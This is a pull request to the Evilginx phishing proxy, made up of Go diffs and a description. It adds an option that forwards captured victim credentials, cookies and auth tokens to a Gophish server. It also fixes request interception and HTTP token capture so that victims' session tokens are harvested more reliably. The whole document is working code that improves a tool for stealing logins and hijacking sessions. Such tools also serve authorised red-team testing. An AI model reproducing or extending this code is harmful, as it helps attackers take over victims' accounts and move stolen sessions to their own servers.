### PR TITLE
Ability to send captured sessions to gophish (needs gophish update)

### DIFF
--- a/core/config.go
+++ b/core/config.go
@@ -62,6 +62,7 @@ type CertificatesConfig struct {
 type GoPhishConfig struct {
 	AdminUrl    string `mapstructure:"admin_url" json:"admin_url" yaml:"admin_url"`
 	ApiKey      string `mapstructure:"api_key" json:"api_key" yaml:"api_key"`
+	Sessions      bool `mapstructure:"sessions" json:"sessions" yaml:"sessions"`
 	InsecureTLS bool   `mapstructure:"insecure" json:"insecure" yaml:"insecure"`
 }
 
@@ -377,6 +378,13 @@ func (c *Config) SetGoPhishInsecureTLS(k bool) {
 	c.gophishConfig.InsecureTLS = k
 	c.cfg.Set(CFG_GOPHISH, c.gophishConfig)
 	log.Info("gophish insecure set to: %v", k)
+	c.cfg.WriteConfig()
+}
+
+func (c *Config) SetGoPhishSessions(k bool) {
+	c.gophishConfig.Sessions = k
+	c.cfg.Set(CFG_GOPHISH, c.gophishConfig)
+	log.Info("gophish sessions set to: %v", k)
 	c.cfg.WriteConfig()
 }
 
@@ -822,4 +830,8 @@ func (c *Config) GetGoPhishApiKey() string {
 
 func (c *Config) GetGoPhishInsecureTLS() bool {
 	return c.gophishConfig.InsecureTLS
+}
+
+func (c *Config) GetGoPhishSessions() bool {
+	return c.gophishConfig.Sessions
 }

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -852,7 +852,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 				// check if request should be intercepted
 				if pl != nil {
-					if r_host, ok := p.replaceHostWithOriginal(req.Host); ok {
+					if r_host, ok := p.replaceHostWithOriginal(o_host); ok {
 						for _, ic := range pl.intercept {
 							//log.Debug("ic.domain:%s r_host:%s", ic.domain, r_host)
 							//log.Debug("ic.path:%s path:%s", ic.path, req.URL.Path)
@@ -1023,9 +1023,11 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					// capture http header tokens
 					for k, v := range pl.httpAuthTokens {
 						if _, ok := s.HttpTokens[k]; !ok {
-							hv := resp.Request.Header.Get(v.header)
-							if hv != "" {
-								s.HttpTokens[k] = hv
+							if req_hostname == v.domain && v.path.MatchString(resp.Request.URL.Path) {
+								hv := resp.Header.Get(v.header)
+								if hv != "" {
+									s.HttpTokens[k] = hv
+								}
 							}
 						}
 					}

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -384,7 +384,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 												rid, ok := session.Params["rid"]
 												if ok && rid != "" {
 													log.Info("[gophish] [%s] email opened: %s (%s)", hiblue.Sprint(pl_name), req.Header.Get("User-Agent"), remote_addr)
-													p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
+													p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
 													err = p.gophish.ReportEmailOpened(rid, remote_addr, req.Header.Get("User-Agent"))
 													if err != nil {
 														log.Error("gophish: %s", err)
@@ -405,7 +405,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 									if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
 										rid, ok := session.Params["rid"]
 										if ok && rid != "" {
-											p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
+											p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
 											err = p.gophish.ReportEmailLinkClicked(rid, remote_addr, req.Header.Get("User-Agent"))
 											if err != nil {
 												log.Error("gophish: %s", err)
@@ -466,7 +466,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						return p.blockRequest(req)
 					}
 				}
-				req.Header.Set(p.getHomeDir(), o_host)
+				//req.Header.Set(p.getHomeDir(), o_host)
 
 				if ps.SessionId != "" {
 					if s, ok := p.sessions[ps.SessionId]; ok {
@@ -656,7 +656,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 				// check for creds in request body
 				if pl != nil && ps.SessionId != "" {
-					req.Header.Set(p.getHomeDir(), o_host)
+					//req.Header.Set(p.getHomeDir(), o_host)
 					body, err := ioutil.ReadAll(req.Body)
 					if err == nil {
 						req.Body = ioutil.NopCloser(bytes.NewBuffer([]byte(body)))
@@ -1067,8 +1067,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
 							rid, ok := s.Params["rid"]
 							if ok && rid != "" {
-								p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
-								err = p.gophish.ReportCredentialsSubmitted(rid, s.RemoteAddr, s.UserAgent)
+								p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
+								err = p.gophish.ReportCredentialsSubmitted(rid, s, p.cfg.GetGoPhishSessions())
 								if err != nil {
 									log.Error("gophish: %s", err)
 								}
@@ -1207,8 +1207,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 							if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
 								rid, ok := s.Params["rid"]
 								if ok && rid != "" {
-									p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
-									err = p.gophish.ReportCredentialsSubmitted(rid, s.RemoteAddr, s.UserAgent)
+									p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
+									err = p.gophish.ReportCredentialsSubmitted(rid, s, p.cfg.GetGoPhishSessions())
 									if err != nil {
 										log.Error("gophish: %s", err)
 									}


### PR DESCRIPTION
Hello there,

By default, Evilginx does not send session information to Gophish. This is on purpose not to expose credentials and keep them in Evilginx only. Nevertheless, having credentials readily available in Gophish could be a nice feature to have, provided Gophish's admin interface is properly secured (with a firewall for instance).

The main (second) commit introduces the ability to send captured sessions to Gophish via a config flag (`config gophish sessions`). This is an opt-in feature to keep the default behavior, which does not expose credentials and keeps them in Evilginx only.

NB: This update requires the ability for Gophish to receive session information (see https://github.com/kgretzky/gophish/pull/3).

Default behavior (or after `config gophish sessions false` in Evilginx' terminal):

![Capture d’écran 2024-10-24 à 23 48 54](https://github.com/user-attachments/assets/6eeabdb5-c323-49a7-9f04-d1cd1bbe5d90)

After `config gophish sessions true` in Evilginx' terminal:

![Capture d’écran 2024-10-24 à 23 51 10](https://github.com/user-attachments/assets/a17ab0d2-b43c-4ca0-8a84-333bb913d0ba)

The feature takes into account all three types of credentials (username, password and `custom`) and all three types of `auth_tokens` (cookies, body and HTTP tokens).

---

The first commit contains two fixes regarding request interception and HTTP token capture.

**Request interception:**

The value of `req.Host` contains the legitimate remote host and not the phishing host anymore after commit `e3bef9433c3cc95d3e523533e498c834506739f0` enabling the capture of credentials in intercepted requests. The comparison fails and the request is not intercepted.

**HTTP token capture:**

The header should be captured from the response (`resp.Header`) and not the request (`resp.Request.Header`). The check should not be performed on every endpoint, but taking into account the domain and path specified in the phishlet (`v.domain` and `v.path`).